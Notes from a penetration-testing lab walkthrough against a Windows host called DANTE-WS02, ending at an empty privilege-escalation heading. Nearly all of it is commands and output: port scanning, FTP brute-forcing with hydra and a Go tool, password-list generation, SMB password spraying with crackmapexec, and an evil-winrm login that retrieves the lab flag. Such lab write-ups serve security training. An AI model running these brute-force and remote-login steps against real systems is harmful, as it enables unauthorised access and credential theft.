Enumeration

Rustscan

rustscan -a 172.16.1.101 --ulimit 5000 -- -Pn -sV --script \"'vuln'\"

Open 172.16.1.101:21
Open 172.16.1.101:139
Open 172.16.1.101:135
Open 172.16.1.101:445
Open 172.16.1.101:5040
Open 172.16.1.101:5985
Open 172.16.1.101:47001
Open 172.16.1.101:49665
Open 172.16.1.101:49667
Open 172.16.1.101:49664
Open 172.16.1.101:49669
Open 172.16.1.101:49666
Open 172.16.1.101:49670
Open 172.16.1.101:49668

PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack FileZilla ftpd
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
5040/tcp  open  unknown       syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-csrf: Couldn't find any CSRF vulnerabilities.
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

No Success on anything It might be dependent on other machine.

Found the passwords field in xls file from dc01

Hydra ftp bruteforece (To slow)

hydra -L users.txt -P pass.txt ftp://172.16.1.101

Brute force ftp written in go

git clone https://github.com/rix4uni/FTPBruteForce

Combine users.txt and pass.txt

paste -d: users.txt pass.txt > userpass.txt

Bruteforcing

go mod init ftp-brute-force.go
go mod tidy
go run ftp-brute-force-default-credentails.go -up ../userpass.txt -ip 172.16.1.101:21

Output

Trying asmith:Princess1
Trying smoggat:Summer2019
Trying tmodle:P45678!
Trying ccraven:Password1
Trying kploty:Teacher65
Trying jbercov:4567Holiday1
Trying whaguey:acb123
Trying dcamtan:WorldOfWarcraft67
Trying tspadly:RopeBlackfieldForwardslash
Trying ematlis:JuneJuly1TY
Trying fglacdon:FinalFantasy7
Trying tmentrso:65RedBalloons
Trying dharding:WestminsterOrange5
Successfully login with ip:172.16.1.101:21 username:dharding password:WestminsterOrange5

FTP login

ftp 172.16.1.101
dharding
 
ls
 
mget *

Found login.txt file

Dido, I’ve had to change your account password due to some security issues we have recently become aware of

It’s similar to your FTP password, but with a different number (ie. not 5!)

Come and see me in person to retrieve your password.

thanks, James

Account passowrd changed

It means that we need to create new passlist for the user dharding. We then try brute forcing it.

Creating a passlist

for i in {1..50}; do echo "WestminsterOrange$i"; done > newpasslist.txt

Bruteforcing with crackmapexec

crackmapexec smb 172.16.1.101 -u 'dharding' -p newpasslist.txt 2>/dev/null
 
SMB         172.16.1.101    445    DANTE-WS02       [+] DANTE-WS02\dharding:WestminsterOrange17

Looking for the shares

crackmapexec smb 172.16.1.101 -u 'dharding' -p 'WestminsterOrange17' --shares 2>/dev/null
 
SMB         172.16.1.101    445    DANTE-WS02       Share           Permissions     Remark
SMB         172.16.1.101    445    DANTE-WS02       -----           -----------     ------
SMB         172.16.1.101    445    DANTE-WS02       ADMIN$                          Remote Admin
SMB         172.16.1.101    445    DANTE-WS02       C$                              Default share
SMB         172.16.1.101    445    DANTE-WS02       IPC$            READ            Remote IPC
 
 
 

Checking winrm with crackmapexec

crackmapexec winrm 172.16.1.101 -u 'dharding' -p 'WestminsterOrange17' 2>/dev/null

➜ crackmapexec winrm 172.16.1.101 -u 'dharding' -p 'WestminsterOrange17' 2>/dev/null
SMB         172.16.1.101    5985   DANTE-WS02       [*] Windows 10.0 Build 18362 (name:DANTE-WS02) (domain:DANTE-WS02)
HTTP        172.16.1.101    5985   DANTE-WS02       [*] http://172.16.1.101:5985/wsman
WINRM       172.16.1.101    5985   DANTE-WS02       [+] DANTE-WS02\dharding:WestminsterOrange17 (Pwn3d!)

Logging into winrm

evil-winrm -i 172.16.1.101 -u 'dharding' -p 'WestminsterOrange17' /domain:dante.local

flag

*Evil-WinRM* PS C:\Users\dharding\Desktop> cat flag.txt
 
DANTE{superB4d_p4ssw0rd_FTW}

Priv Esc